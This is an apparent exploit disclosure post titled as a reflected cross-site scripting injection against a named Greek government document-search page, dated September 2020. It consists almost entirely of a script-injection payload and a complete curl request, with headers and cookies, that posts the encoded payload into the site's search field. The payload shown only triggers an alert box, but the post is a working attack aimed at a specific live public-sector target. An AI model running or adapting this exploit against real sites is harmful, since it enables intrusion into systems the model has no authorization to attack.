Exploit Title : Greece Decentralized Administration Of MACEDONIA-THRACE XSS Injection
Exploit Type : Reflected Cross Site Scripting
Exploit Date 02-09-2020
Exploit Link : http://docman.damt.gov.gr/docman.php

Exploit : 

"><script>alert(0);</script>

curl 'http://docman.damt.gov.gr/docman.php' \
  -H 'Connection: keep-alive' \
  -H 'Cache-Control: max-age=0' \
  -H 'Upgrade-Insecure-Requests: 1' \
  -H 'Origin: http://docman.damt.gov.gr' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Edg/85.0.564.44' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
  -H 'Referer: http://docman.damt.gov.gr/docman.php' \
  -H 'Accept-Language: tr,en;q=0.9,en-GB;q=0.8,en-US;q=0.7' \
  -H 'Cookie: __utmz=230322057.1597781496.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=230322057.784426167.1597781496.1597862443.1598304986.3; __utma=133562651.2033764111.1598305060.1598305060.1598305060.1; __utmz=133562651.1598305060.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)' \
  --data-raw 'searchdoc=<b>%22%3E%3Cscript%3Ealert%280%29%3B%3C%2Fscript%3E</b>&searchproto=&anazitisi.x=49&anazitisi.y=11' \
  --compressed \
  --insecure